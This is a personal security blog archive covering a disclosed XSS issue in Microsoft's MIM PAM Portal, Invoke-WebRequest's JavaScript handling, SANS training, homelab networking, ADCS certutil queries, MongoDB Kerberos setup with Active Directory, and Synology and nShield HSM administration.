I reported these issues to Microsoft through their responsible disclosure program in December, right before the holidays. After investigating the matter internally, they have provided a fix to the sample PAM Portal. The January 2019 revision of the code is no longer suceptible to an XSS attack.

Microsoft's resolution consists of hardening the coding of the PAM Portal itself: no data retrieve from the database will be interpreted as HTML. Instead it is hard-interpreted as plain text. Refer to the Github pull request chat for details.

They have NOT adjusted the MIM PAM REST API, which will continue to accept and store any user input offered. This means that accessing the API through Invoke-WebRequest is still susceptible to an XSS attack, because I-WR will happily run any Javascript code found. I showed this with examples earlier this week.

 

Mitigation

Anyone using the Microsoft MIM PAM Portal in their network should upgrade to the latest version of the project as soon as possible.

Also, if you are using the Powershell command Invoke-WebRequest to access the MIM PAM REST API, you should always adding the flag -UseBasicParsing.

 

Sources

  1. O'Reilly Microsoft Identity Manager
  2. TLK Tech Identity Thoughts
  3. Microsoft docs
  4. Sample PAM Portal
  5. Microsoft TechNet forums
  6. Microsoft TechNet forums (2)
  7. Microsoft TechNet forums (3)
  8. Just IDM

kilala.nl tags: , ,

View or add comments (curr. 0)

Surprise! Invoke-WebRequest runs Javascript

2019-02-04 13:45:00

Well! It's been an interesting month, between work and a few vulnerabilities that I'd reported to a vendor. And now there's this little surprise!

Imagine that you're using Powershell's Invoke-WebRequest command in your management scripts, to access an API or to pull in some data. It happens, right? Nothing out of the ordinary! While I was pentesting one particular API, I decided to poke at it manually using Invoke-WebRequest, only to be met with a surprising bonus! The Javascript code I'd sent to the API for an XSS-attack was returned as part of the reply by the API. Lo and behold! My I-WR ran the Javascript locally!

Screenshot 1 shows the server-side of my proof-of-concept: Python running a SimpleHTTPServer, serving up "testpage.html" from my laptop's MacOS.

In the image above you'll also see the Unix/Linux/MacOS version of curl, which simply pulls down the whole HTML file without parsing it.

Now, the image below shows what happens when you pull in the same page through Invoke-WebRequest in Powershell:

Fun times!

This means that every time you run a curl or Invoke-WebRequest on Windows, you'd better be darn sure about the pages you're calling! This Javascript alert is benign enough, but we all know the dangers of cross-site scripting attacks or just plain malevolent Javascript! Annoyingly, I have not yet found a way to disable JS-parsing in these commands. Looks like it can't be done.

What's worse: these commands are often included in scripts that are run using service accounts or by accounts with administrative privileges! That runs afoul of Critical Security Control #5: controlled use of administrative privileges! (More info here @Rapid7). Basically, you're running a whole web browser in your scripting and tooling!

So be careful out there folks! Think before you run scripts! Check before you call to URLs you're not familiar with! Trust, but verify!

EDIT: I've sent an email to Microsoft's security team, see what they think about all this. I mean, I'm sure it's a well-known and documented fact, but personally I'd feel a lot safer if I had the option to disable scripting (like JS) in Invoke-WebRequest.

EDIT: It looks like the only way to disable Javascript in Invoke-WebRequest, is to disable it in the Internet Explorer browser. Guess that makes sense, because doesn't I-WR use the IE engines?


Update and correction

After discussing the matter with the security team of Microsoft, I have come to understand that I have misunderstood the documentation provided for Invoke-WebRequest. It turns out that you can easily protect yourself from this particular problem by always adding the flag -UseBasicParsing.


kilala.nl tags: , ,

View or add comments (curr. 3)

Homebrew CMS security improvements

2019-02-02 21:07:00

Did you know that Mozilla offer a great resource called Observatory? This tool scans your website and provides you focused instructions on how to improve the basic security of your site. It'll help you prevent the most common causes for XSS, CSRF and more! With about an hour's work, I've taken my site from an F score to A+ :)

Now, it's been ages since I've first started work on this website of mine. Can't properly recall when I first started, but it's been at least tens years since version 1.0. I will readily admit that I'm an utter, utter hack: self-taught, borrowing code left and right, just trying to get things work. Along the way I've picked up security lessons, mostly on how to prevent SQLi and XSS. And now, thanks to Observatory I've learned more! 

Mozilla's web security guidelines document has been a great help! Until this week I'd never heard of HSTS or CSP, so I've taken time to improve my site's security posture. This included properly sourcing my own Javascript and diking out a lot of the JS I'd been sourcing externally (reCaptcha, Google Analytics, etc), just because they were dead weight to me. I had heard about SRI before through Troy Hunt's excellent article about Javascript supply chain security.

Anywho. It's been a learning experience! This little blog of mine ain't pretty, nor very exciting, but it's my little home and it makes a nice testbed to practice coding.

Some useful resources that helped me along:


kilala.nl tags: ,

View or add comments (curr. 0)

The (alleged) Ed Skoudis Plan For Success

2019-01-20 07:27:00

In our field we often learn that attribution is hard. In this case it amounts to no more than hearsay. So let's discuss the alleged Ed Skoudis Plan For Success(tm). On our last day at SEC566, our trainer Russel gave us some parting wisdom among which an anecdote. To paraphrase: 

I asked Ed, "Ed, how did you get this far in your career?" and he said "You know? Years and years back, I decided that every day I would take one to two hours for myself and study something new". And that's what I've been doing for the past ten years: every morning I get up at five, knowing I've got the house to myself for at least two hours. the first two days I spent them catching up with email or reading infosec news. But then I thought, there's gotta be a better way to spend this time. So I set myself study goals.

This is a message I can get behind! Mostly because I've been doing the exact same thing for the past six years. ^_^

It's only missing one thing: direction.

Before 2010 I had some less-than-fun experiences with studying. My previous employer had a very rigid process for certification, requiring you to pass through a certain strict of (what I considered to be very drab) certifications before allowing you to move on to the fun stuff. So I'd turned into someone who didn't enjoy studying: it was a "must" instead of a "want". 

Now, studying for my CISSP around that time changed things a bit! I spent weeks upon weeks working through that fat book, doing exercises and research, taking a bootcamp to earn that valued cert. And it was great! But then I turned into a CISSP slacker.

But things got better! Because in 2013 I had enough of it! I'm not a fscking slacker, I'm a professional! Sure, everybody has got their hangups, as do I. So I tackled them! I turned to my best friend and brother-from-another-mother Menno and asked him for choaching. The life-coaching kind of style. I'm very grateful for the help he offered me at the time. 

One of the things to come from those coaching sessions is direction. There we go! The missing ingredient! And the funny things is that what's needed, is already in the title of this post: a plan

Make yourself a plan!

At the time I made a plan that would allow me the bare minimum to retain my CISSP status. That was the first hurdle to take, allowing me more freedom to move and breathe once it'd been taken. Well it worked! And instead of settling back into the slacking I'd done before I started setting myself goals and challenges in the form of certifications. It's not that I believe certifications to be the silver bullet to a great career, but setting them as a goal tends to provide focus: you have to study hard enough, with a certain deadline, to make the cut. 

Initially I consulted friends and collagues to find which certs would provide value to my resumé, which led to the RHCSA and RHCE certs. And from there on, things just kept rolling and expanding! Classes left and right, webinars and videos from infosec conventions and more and more certifications. 

The most important things I've learned:

Without knowing it, I was following Ed's plan all this time. And it has brought me far. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

My experiences as SANS Facilitator (SEC566)

2019-01-17 19:27:00

EDIT:

Oooff... Linking to my homebrew website on a SANS Twitter-feed; how's that for #LivingDangerously? For the love of cookies, please don't hack me. I like my Dreamhost account... ^_^

 


 

About a month ago I explained a bit about the amazing chance I'd been offered by SANS, when they accepted me into their Work/Study Program. My week with SANS is coming to its end, so I thought I'd share a few of my experiences. Quite a few others have shared their stories in the past (linked below), but this is mine. :)

 

As was expected the days are pretty long and the work is hard. But for me they haven't been unbearably long, nor impossibly hard. Overall the atmosphere at SANS Amsterdam has been pretty laidback! 

Before coming to town, our event managers had set up a WhatsApp group so we could stay in close contact before and during the event. This turned out to be very helpful, as we could keep messaging eachother during class through the magic of WA's webapp. You can count on silly memes flying through that chat, but it's been mostly useful :)

Sunday was spent moving and unpacking 250 boxes of books into the respective eight rooms. There's a rather specific layout that SANS want their student-tables to be in (books stacked exactly so-and-so, pen here w/ yellow cap there, logo pointing here and so on. As another Facilitator said: "Clearly someone has put a lot of thought into this...". I've found that, after putting the boxes on the ground in a circle around me, I got into the rhythm of making the stacks real quickly. Setting up the mics and speakers and rigging powerlines was a nice flashback to my days with AnimeCon

Choosing not to stay at an Amsterdam hotel has been both a boon and a burden. Traveling home allows me to see my family every night and saves me quite some dough. It'll also take my head out of SANS a little bit, so I can unwind. On the other hand I'm missing out on the nightly sessions and NetWars

Working with the SEC566 trainer Russell has been nothing but a pleasure. As he himself said, he's "pretty low maintenance". He doesn't need me to go around town to grab things for him, just make sure his water bottles are always available and that the room's ready for use. So instead, most of my time went to the rest of the party: cleaning the room, prepping for the next day and making sure that the other students are "in a good place". A few people were having issues with their lab VMs, some folks had questions about practical SANS matters and others were simply looking for a nice chat. 

Speaking of: I can honestly say that it's been a long while since I've spent time with such a friendly group of people! I know that some folks on the web have been complaining that the InfoSec industry has been toxifying in recent years, but at least we didn't notice anything'bout that at SANS Amsterdam. I've met quite a few fun and interesting people here! 

In short: I am very grateful for the opportunity SANS have given me and I would recommend applying for the role to anyone in a heartbeat!

 


 

EDIT: Because some people have asked, here's my "normal" workday as Facilitator, traveling from home in Almere to Amsterdam.

 

During the lab exercises I usually work ahead, so I'm one chapter ahead of the class. That will allow me to know upfront what kind of problems they may run into and may need help with. As others on TechExams.net have pointed out, Facilitators are NOT the same as TAs (teaching assistants). So on the one hand I am constantly a bit anxious about whether or not I'm butting into the trainer's ground. On the other hand I've had good responses from both classmates and the trainer, so I reckon I didn't tick anyone off... At least not this time :D

I can imagine that it'd be entirely different in a tech-oriented class. I'd have to pipe down a lot more than I did this week. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Homelab: network segregation

2019-01-11 21:06:00

So far I've built a few VMs in my homelab, to house my AD DS and AD CS services (the Directory Services and PKI respectively). There's also a few CentOS 7 boxen spinning up to house Graylog and ElasticSearch

Up until this point, all these VMs were getting their IP addresses from our home's internal network infrastructure. Of course it's always a bad idea to mix production and dev/test environments, so I've set up segregation between the two. The easiest way to achieve this will also help me achieve one of my goals for 2019: get acquainted with the pfSense platform.

pfSense is a BSD-based, open source platform for routers/firewalls that can be run both as a VM or on minimalistic ARM-hardware. In my case, I've done a setup comparable to Garrett Mills' example on Medium.com. In short:

  1. I have defined a new virtual switch in VMWare, tied to one of the unused NICs of the Dell R410.
  2. This new virtual switch ("LabLAN") is then tied to a newly created port group, also called "LabLAN".
  3. The pfSense VM is assigned two NICs: one tied to the default "VM Network" port group, which leads to the used NIC on the R410, and the other tied into the "LabLAN" port group.
  4. After installing pfSense, the "VM Network" NIC is indicated as the WAN-interface, with the "LabLAN" NIC being the LAN-interface.
  5. After running through the basic pfSense configuration, it mostly works out of the box!
  6. I've migrated all the VMs I'd made so far into the "LabLAN" port group, adjusting their IP configurations accordingly. 

BAM! The dev/test VMs are now tucked away into their pocket universe, invisible to our home network. 

EDIT:

The pfSense folks also provide nice documentation on setting up their product inside VMWare ESX.


kilala.nl tags: , ,

View or add comments (curr. 0)

Expanding my homelab

2019-01-10 21:47:00

(C) Dell

For the past X years, I've ran my homelab on my Macbook Air. I've always been impressed with how much you can get away with, on this light portable, sporting an i5 and 8GB of RAM. It'll run two Win2012 VMs and a number of small Linux hosts, aside the MacOS host.

But there's the urge for more! I've been playing with so much cool stuff over the years! I wan't to emulate a whole corporate environment for my studies and tests!

Like the OpenSOC folks, I've been eyeing those Skull Canyon Intel NUCs. They're so sexy! Tiny footprint, combined with great performance! But they're also quite expensive and they don't have proper storage on board. My colleague Martin put me on the trail of local refurbishers and last week I hit gold. 

Well... Fool's Gold, maybe. But still! It was shiny, it looked decent and the price was okay. I bought a refurbished Dell R410

Quick specs:

Yes, it's pretty old already (generation 11 Dell hardware). Yes, it's power hungry. Yes, it's loud. But it was affordable and it's giving me a chance to work with enterprise hardware again, after being out of the server rooms for a long while. 

After receiving the pizza box and inspecting it for damage, the first order of business was to setup its iDRAC6. iDRAC is Dell's solution to what vendors like HP call ILO: a tiny bit of embedded hardware that can be used across the network to manage the whole server's hardware.

The iDRAC configuration was tackled swiftly and the web interface was available immediately. It took a bit of digging in Dell's documentation, but I learned how to flash the iDRAC6 firmware so I could upgrade it to the latest (2.95) version. It really was as easy as downloading the "monolithic" iDRAC firmware, extracting the .D6 file and uploading it through the iDRAC web interface. Actually finding the upload/update button in the interface took more effort :p

Getting the iDRAC6 remote console working took a little more research. For version 6 of the hardware, the remote console relies upon a Java application, which you can call by clicking a button in the web interface. What this does is download a JNLP configuration file, which in turn downloads the actual JAR file for execution. This is a process that doesn't work reliably on modern MacOS due to all the restrictions put on Java. The good news is that Github user Nicola ("XBB") provides instructions on how to reliably and quickly start the remote console for any iDRAC6 on MacOS, Linux and Windows. 

Last night I installed VMWare ESXi 6.5, which I've been told is the highest version that'll work on this box. No worries, it's good stuff! The installation worked well, installing onto a SanDisk Cruzer Fit mini USB-drive that's stuck into the front panel. I still have a lot of learning to do with VMWare :)

In the mean time, there's two VMs building and updating (Win2012 and CentOS7), so I can use them as the basis for my "corporate" environment. 

My plans for the near future:

I'm having so much fun! :D


kilala.nl tags: , ,

View or add comments (curr. 0)

I was accepted as SANS Facilitator!

2018-12-19 20:10:00

Great news everyone!

The excitement is palpable!

A number of past colleagues waxed lyrically about SANS trainings: in-depth, high-tech, wizardry, grueling pace and super-hard work! And at the same time one heck of a lot of fun! And I must admit that I've spent quite a few hours browsing their site, drooling at the courses and exams they offer. They certainly are a well known name in the InfoSec world, having a good reputation and being downright famous for their coin challenges and the high level of skill they both garner and require. 

Unfortunately I could never get past the steep bill! Yes, they're very good! But each course rings in around $6000! And their Netwars and exams don't come cheap either! So I just sighed and closed the tab, only to revisit months later. But this year things changed! Somewhere in September I learned something that I should've known before! I don't even remember whether I read about it on Reddit, on Tweakers or on TechExams, but it was a great find nonetheless!

SANS offer what they call the Work/Study Program. To quote their own site:

"The Work Study Program is a popular and competitive method of SANS training which allows a selected applicant the opportunity to attend a live training event as a facilitator at a highly discounted tuition rate. SANS facilitators are cheerful, friendly, and ever-ready professionals who are selected to assist SANS staff and instructors in conducting a positive learning environment. Advantages of the SANS Work Study Program include:

  • Attend and participate in a 4-6 day course
  • Receive related courseware materials
  • Work with Certified Instructors and SANS Staff
  • Attend applicable Vendor Lunch & Learns, SANS@Night, and other Special Events
  • Opportunities to network with security professionals
  • Free corresponding GIAC certification exam attempt [if available], when lodging onsite at the host hotel
  • Request early access to online OnDemand integrated slides and notes [if available]"

How great is that?! By helping out at the event and putting in a lot of hard work, you get a discount, plus a whole wad of extras to make sure you still get the full benefit of the training you signed up for! I decided then and there to apply for the role of Facilitator for the upcoming Amsterdam event, in January 2019.

I honestly did not think I stood much of a chance because, as SANS say, it's highly competitive and SANS often prefer past SANS-students or -facilitators and I am neither. On the upside, I do have a lot of organizational experience in running events, with many thanks to all those years of staffing and volunteering with AnimeCon

I'd almost forgotten about my application, until a few weeks ago when the email above shows up! OMG! O_O I got accepted!

Now that all the paperwork has been settled I also have a better grasp of both my responsibilities and the perks I'll be receiving. I was assigned to SEC566 - Implementing and Auditing Critical Security Controls, a five-day course (the whole event actually last six days). My duties at the event are actually not disimilar to gophering at AnimeCon! I'll be assisting the course's trainer, basically not leaving their side unless they need something from outside. I'll also be responsible for the security of the assigned classroom and will act a sort-of guide and friendly face to the other students. Where "normal" students will have 0900-1700 days, mine will most likely be 0700-1900. That's gonna be tough! The Sunday before the event starts will also be a full workday, preparing the venue with all the cabling, networking, equipment and the book bags for students. 

And that discount we're getting? When I signed up I had not fully understood what SANS wrote on their site:

"The Work Study tuition fee is USD 1,500 or EUR 1,300 plus any VAT depending on the event location. Should you be selected to facilitate a Summit presentation, the fee is $250 or 217 per day plus any VAT for European events. International Tax/VAT will apply for certain events."

A €1300 discount sounded pretty darn good to me, when combined with all those bonuses! Turns out I misunderstood. The final fee is €1300! So on a total value of >$8100, they're discounting me €6800.  O_O

To say I'm stoked for SANS Amsterdam, would be severely understating my situation! I am very grateful for being given this opportunity and I'm going to work my ass off! I'll make sure SANS won't regret having accepted me!


kilala.nl tags: ,

View or add comments (curr. 0)

Certificate life-cycle management with ADCS

2018-11-28 16:49:00

Following up on my previous post on querying ADCS with certutil, I spent an hour digging around ADCS some more with a colleague. We were looking for ways to make our lives easier when performing certificate life cycle management, i.e. figuring out which certs need replacing soon. 

Want to find all certs that expire before 0800 on January first 2022?

certutil –view –restrict “NotAfter<1/1/2022 08:00”

 

However, this also shows the revoked certificates, so lets focus on those that have the status "issued". Here's a list of the most interesting disposition values.

certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14”

 

Now that'll give us the full dump of those certs, so let's focus on just getting the relevant request IDs.

certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14” –out “RequestId”

 

Mind you, many certs can be setup to auto-enroll, which means we can automatically renew them through the ADCS GUI by going into Template Management and telling AD to tweak all currently registered holders, making them re-enroll. That's a neat trick!

Of course this leaves us with a wad of certificates that need manual replacement. It's easier to handle these on a per-template basis. To filter on these, we'll need to get the template ID. You can do this through the ADCS GUI, or you can query a known cert and output it's cert template ID.

certutil –view –restrict “requestid=3162” –out certificatetemplate

 

So our query now becomes:

certutil –view –restrict “NotAfter<1/1/2022 08:00,Disposition=0x14,certificatetemplate=1.3.6.1.4.1.311.21.8.7200461.8477407.14696588202437.5899189.95.14580585.6404328” –out “RequestId”

 

Sure, the output isn't easily used in a script unless you add some output parsing (there are white lines and all manner of kruft around the request IDs), but you get the picture. This will at least help you get a quick feeling for the amount of work you're up against. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Kerberos authentication in MongoDB, with Active Directory

2018-11-22 19:35:00

I've been studying MongoDB recently, through the excellent Mongo University. I can heartily recommend their online courses! While not entirely self-paced, they allow you enough flexibility to finish each course within a certain timeframe. They combined video lectures with (ungraded) quizes, and graded labs and an exam. Good stuff!

I'm currently taking M310, the MongoDB Security course. One of the subjects covered is Kerberos authentication with MongoDB. In their lectures they show off a use-case with a Linux KDC, but I was more interested in copying the results with my Active Directory server. It took a little puzzling, a few good sources (linked below) and three hours of mucking with the final troubleshooting. But it works very nicely! 

 

On the Active Directory side:

 We'll have to make a normal user / service account first. I'll call it svc-mongo. This can easily be done in many ways; I used ADUC (AD Users and Computers).

Once svc-mongo exists, we'll connect it to a new Kerberos SPN: a Service Principal Name. This is how MongoDB will identify itself to Kerberos. We'll make the SPN, link it to svc-mongo and make the associated keytab (an authentication file, consider it the user's password) all in one blow:

ktpass /out m310.keytab /princ mongodb/database.m310.mongodb.university@CORP.BROEHAHA.NL /mapuser svc-mongo /crypto AES256-SHA1 /ptype KRB5_NT_PRINCIPAL /pass Password2

 

This creates the m310.keytab file and maps the SPN "mongodb/database.m310.mongodb.university" to the svc-mongo account. The SPN is written in the format "service/fullhostname/domain". The password for the user is also changed and some settings are set pertaining to the used cryptography and Kerberos structures. 

You can verify the SPN's existence with the setspn -Q command. For example:

PS C:usersThomasDocuments> setspn -Q mongodb/database.m310.mongodb.university
Checking domain DC=corp,DC=broehaha,DC=nl
CN=svc-mongo,CN=Users,DC=corp,DC=broehaha,DC=nl
       mongodb/database.m310.mongodb.university

Existing SPN found!

 

The m310.keytab file is then copied to the MongoDB server (database.m310.mongodb.university). In my case I use SCP, because I run Mongo on Linux. 

 

On the Linux side:

The m310.keytab file is placed into /etc/, with permissions set to 640 and ownership root:mongod. In order to use the keytab we can set an environment variable: KRB5_KTNAME="/etc/m310.keytab". This can be done in the profile of the user running MongoDB, or on RHEL-derivates in a sysconfig file. 

We need to setup /etc/krb5.conf with the bare minimum, so the Kerberos client can find the domain:

[libdefaults]
default_realm = CORP.BROEHAHA.NL

[realms]
CORP.BROEHAHA.NL = {
kdc = corp.broehaha.nl
admin_server = corp.broehaha.nl
}

[domain_realm]
.corp.broehaha.nl = CORP.BROEHAHA.NL
corp.broehaha.nl = CORP.BROEHAHA.NL

[logging]
default = FILE:/var/log/krb5.log

 

Speaking of finding the domain, there are a few crucial things that need to be setup correctly!

With that out of the way, we can start making sure that MongoDB knows about my personal user account. If the Mongo database does not yet have any user accounts setup, then we'll need to use the "localhost bypass" so we can setup a root user first. Once there is an administrative user, run MongoD in normal authorization-enabled mode. For example, again the barest of bare minimums:

mongod --auth --bind_ip database.m310.mongodb.university --dbpath /data/db

 

You can then connect as the administrative user so you can setup the Kerberos account(s):

mongo --host database.m310.mongodb.university:27017 --authenticationDatabase admin --user root --password
MongoDB> use $external 
MongoDB> db.createUser({user:"tess@CORP.BROEHAHA.NL", roles:[{role:"root",database:"admin"}]}) 

 

And with that out of the way, now that we can actually use Kerberos-auth. We'll restart MongoD with Kerberos enabled, at the same time disabling the standard Mongo password authentication and thus lock out the root user we used above. 

mongod --auth --bind_ip database.m310.mongodb.university --authenticationMechanisms=GSSAPI --dbpath /data/db

 

We can then request a Kerberos ticket for my own account, start a Mongo shell and authenticate inside Mongo as myself:

root@database:~# kinit tess@CORP.BROEHAHA.NL -V
Using default cache: /tmp/krb5cc_0
Using principal: tess@CORP.BROEHAHA.NL
Password for tess@CORP.BROEHAHA.NL:
Authenticated to Kerberos v5

root@database:~# mongo --host database.m310.mongodb.university:27017
MongoDB shell version: 3.2.21
connecting to: database.m310.mongodb.university:27017/test

MongoDB Enterprise > use $external
switched to db $external

MongoDB Enterprise > db.auth({mechanism:"GSSAPI", user:"tess@CORP.BROEHAHA.NL"})
1

 

HUZZAH! It worked!

Oh right!.. What was the thing that took me hours of troubleshooting? Initially I ran MongoD without the --bind_ip option to tie it to the external IP address and hostname. I was running it on localhost. :( And thus the MongoD process identified itself to the KDC as mongodb/localhost. It never showed that in any logging, so that's why I missed it. I had assumed that simply passing the keytab file was enough to authenticate.

 

Sources:


kilala.nl tags: , ,

View or add comments (curr. 0)

Query ADCS (Active Directory Certificate Services) for certificate details

2018-11-01 18:44:00

I think Microsoft's ADCS is quite a nice platform to work with, as far as PKI systems go. I've heard people say that it's one of the nicest out there, but given its spartan interface that kind of makes me worry for the competitors! One of the things I've fought with, was querying the database backend, to find certificates matching specific details. It took me a lot of Googling and messing around to come up with the following examples.

 

To get the details of a specific request:

certutil -view -restrict "requestid=381"

 

To show all certificate requests submitted by myself:

certutil -view -restrict "requestername=domain\t.sluijter"

 

To show all certificates that I requested, displaying the serial numbers, the requestor's name and the CN on the certificate. It'll even show some statistics at the bottom:

certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,requestername,commonname"

 

Show all certificates provided to TESTBOX001. The query language is so unwieldy that you'll have to ask for "hosts >testbox001 and <testbox002".

certutil -view -restrict "commonname>testbox001,commonname<testbox002" -out "serialnumber,requestername,commonname"

 

A certificate request's disposition will show you errors that occured during submission, but it'll also show other useful data. Issued certificates will show whom approved the issuance. The downside to this is that the approver's name will disappear once the certificate is revoked. So you'll need to retain the auditing logs for ADCS!

certutil -view -restrict "requestid=381" -out "commonname,requestername,disposition,dispositionmessage"    

certutil -view -restrict "requestid=301" -out "commonname,requestername,disposition,dispositionmessage"    

 

Would you like to find out which certificate requests I approved? Then we'll need to add a bit more Powershell.

certutil -view -out "serialnumber,dispositionmessage" | select-string "Resubmitted by DOMAIN\t.sluijter"

 

Or even better yet:

certutil -view -out "serialnumber,dispositionmessage" | ForEach {

    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}

    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }

    }

 

Or something very important: do you want to find certificates that I both request AND approved? That's a bad situation to be in...

certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,dispositionmessage" | ForEach {

    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}

    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }

    }

 

If you'd like to take a stab at the intended purpose for the certificate and its keypair, then you can take a gander at the template fields. While the template doesn't guarantee what the cert is for, it ought to give you an impression. 

certutil -view -restrict "requestid=301" -out "commonname,requestername,certificatetemplate"


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another quarter, another beta

2018-10-05 21:07:00

I took the CompTIA Linux+ beta (XK1-004) today and I wasn't very impressed... It's "ok".

I have no recent experience with LPIC or with the previous version of Linux+, only with LPIC from ten years ago. Based on that I feel that the new Linux+ is less... exciting? thrilling? than what I'd expect from LPIC. It feels to me like a traditional Linux-junior exam with its odd fascination on TAR, but with modern subjects (like Git or virtualization) tacked on the side.

Personally I disliked one of the PBQ's, with a simulated terminal. This simulation would only accept the exact, literal command and parameter combinations that have been programmed into it. Anything else, any other permutation of flags, results in the same error message. Imagine my frustration when a command that I run almost daily to solve the question at hand is not accepted, because I'm not using the exact flags or the order thereof that they want me to type. 

Anyway. I'm glad that I took the beta, simply to get more feeling of the (international) market place. Now at least I'll know what the cert entails, should I ever see it on an applicant's resumé. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed the PenTest+ beta exam!

2018-07-31 21:29:00

A bit over three months ago, I took part in CompTIA's beta version of the PenTest+ exam. It was a fun and learning experience and despite having some experience, I didn't expect to pass. 

Turns out, I did! I passed with an 821 out of 900 score :D 

Now, I hope that some of the feedback I provided has been useful. That's the point of those beta exams, isn't it?


kilala.nl tags: , ,

View or add comments (curr. 1)

CFR-310 beta exam experience

2018-07-17 22:08:00

I guess I've found a new hobby: taking beta-versions of cybersec certification exams. :)

Three months ago I took the CompTIA Pentest+ beta and not half an hour ago I finished the CertNexus CFR-310 beta. Like before, I learned about the beta-track through /r/netsecstudents where it was advertised with a discount code bringing the $250 exam down to $40 and ultimately $20. Regardless of whether the certification has any real-world value, that's a nice amount to spend on some fun!

To sum up my experience:

Now... Is the CFR-310 certification "worth it"? As I've remarked on Peerlyst earlier this week: it depends.

If you have a specific job requirement to pass this cert, then yes it's obviously worth it. Then again, most likely your employer or company will spring for the exam and it won't be any skin off your back. And if you're a forward thinking contractor looking to get assignments with the DoD, then it could certainly be useful to sit the exam as it's on the DoD 8570 list for two CSSP positions.

If, like me, you're relatively free to spend your training budget and you're looking for something fun to spend a few weeks on, then I'd suggest you move on to CompTIA's offerings. CertNexus / Logical Operations are not names I'd heard before and CompTIA is a household-name in IT; has been for years. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Synology vagueries: slow transfers, 100% volume util, very high load average, very high IOWAIT

2018-06-28 22:30:00

I've been a very happy user of Synology systems for quite a few years now. The past few weeks I've ran into quite some performance issues though, so I decided to get to the bottom of it.

Symptoms:

I have undertaken a few steps that seem to have gotten me in the right direction...

  1. I have gone over the list of active services and disabled the ones I do not use.
  2. I verified the installed packages and I've removed all the things I really don't need.
  3. I have disabled the Universal Search function, which cannot be disabled without trickery (see below).
  4. I have disabled the Indexing daemon in full, which also cannot be disabled without extra effort (also below).

In order to disable Universal Search:

  1. Login through SSH
  2. cd /var/packages/SynoFinder
  3. sudo cp INFO INFO.orig
  4. sudo vi INFO

Make the following changes:

ctl_stop="yes"
ctl_uninstall="yes"

You can now restart Package Center in the GUI, browse to Universal Search / SynoFinder and stop the service. You could even uninstall it if you like.

In order to disable the Indexer daemon:

  1. Login through SSH
  2. sudo synoservice --hard-stop synoindexd
  3. sudo synoservice --disable synoindexd

The second step is needed to also stop and disable the synomkthumb and synomkflvd services, which rely upon the synoindexd.

One reboot later and things have quieted down. I'll keep an eye on things the next few days.


kilala.nl tags: ,

View or add comments (curr. 5)

Keywords for this week: Windows, Linux, PKI and DAMTA

2018-06-24 20:41:00

It's gonna be a busy week! 

Most importantly, I'll be taking CQure's "DAMTA" training: Defense Against Modern Targeted Attacks. Basically, an introduction to threat hunting and improved Blue Teaming. Sounds like it's going to be a blast and I'm looking forward to it a lot :)

Unfortunately this also means I'll be gone from the office at $CLIENT for three days; that bits, 'cause I'm in the midst of a lot of PKi and security-related activities. To make sure I don't fall behind too much I'm running most of my experiments in the evenings and weekend. 

For example, I've spent a few hours this weekend on setting up a Microsoft ADCS NDES server, which integrates with my Active Directory setup and the base ADCS. My Windows domain works swimmingly, but now it's time to integrate Linux. Now I'm looking at tools like SSCEP and CertMonger to get the show on the road. To make things even cooler, I'll also integrate both my Kali and my CentOS servers with AD. 

Busy, busy, busy :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Handy tool to troubleshoot your Microsoft ADCS PKI

2018-06-23 14:08:00

Doesn't look like much, but it's great

It has been little over a year now since I started at $CLIENT. I've learned so many new things in those twelve months, it's almost mindboggling. Here's how I described it to an acquaintance recently:

"To say that I’m one lucky guy would be understating things. Little over a year ago I was interviewed to join a project as their “pki guy”: I had very little experience with certificates, had messed around a bit with nShield HSMs, but my customer was willing to take a chance on me. ... ... A year onwards I’ve put together something that I feel is pretty sturdy. ... We have working DTAP environments, the production environment’s been covered with a decent keygen ceremony and I’m training the support crew for their admin-tasks. There’s still plenty of issues to iron out, like our first root/issuing CA renewal in a few weeks, but I’m feeling pretty good about it all."

As I described to them, I feel that I'm at a 5/10 right now when it comes to PKI experience. I have a good grasp of the basics, I understand some of the intricacies, I've dodged a bunch of pitfalls and I've come to know at least one platform.

How little I know about this specific platform (Microsoft's Active Directory Certificate Services) gets reinforced frequently, for example by stumbling upon Brian Komar's reply to this thread. The screenshot above might not look like much, but it made my day yesterday :) "Pkiview.msc" you say? It builds a tree-view of your PKI's structure on the lefthand side and on the right side it will show you all the relevant data points for each CA in the list. 

This is awesome, because it will show you immediately when one of your important pieces of meta-data goes unavailable. For example, in the PKI I built I have a bunch of clones of the CRL Distribution Point (CDP) spread across the network. Oddly, these clones were lighting up red in the pkiview tool. Turns out that the cloning script had died a whiles back, without any of us noticing. 

So yeah, it may not look like much, but that's one great troubleshooting tool :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Inventory of certificates, private keys and nShield HSM kmdata files

2018-05-22 18:54:00

Building on my previous Thales nShield HSM blog post, here's a nice improvement.

If you make an array with (FQDN) hostnames of HSM-clients you can run the following Powershell script on your RFS-box to traverse all HSM-systems so you can cross-reference their certs to the kmdata files in your nShield RFS.

$Hosts="host1","host2","host3"

ForEach ($TargetHost) in $Hosts)

{
               Invoke-Command -ComputerName $TargetHost -ScriptBlock {
                              $Thumbs=Get-ChildItem cert:LocalMachineMy
                             ForEach ($TP in $Thumbs.thumbprint) {
                                             $BLOB=(certutil -store My $TP);
                                             $HOSTNAME=(hostname);
                                             $SUBJ=($BLOB | Select-String "Subject:").ToString().Replace("Subject: ","");
                                             $CONT=($BLOB | Select-String "Key Container =").ToString().Replace("Key Container = ","").Replace(" ","");
                                             Write-Output "$HOSTNAME $TP ""$SUBJ"" ""$CONT""";
                             }
              }

 
$KeyFiles = Get-ChildItem 'C:ProgramData CipherKey Management DataLocalkey_caping*'
